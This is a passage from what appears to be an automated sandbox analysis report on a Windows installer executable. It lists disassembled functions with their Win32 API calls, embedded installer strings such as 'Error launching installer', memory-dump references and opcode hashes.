                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                            • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                            • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                            • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                            • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                            • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                            • String ID: Version
                                                                                                                                                                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                            • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                            • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                            • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                            • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                            • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                            • String ID: !N~
                                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                            • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                            • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                            • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                            • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                            • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                            • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                            Memory Dump Source
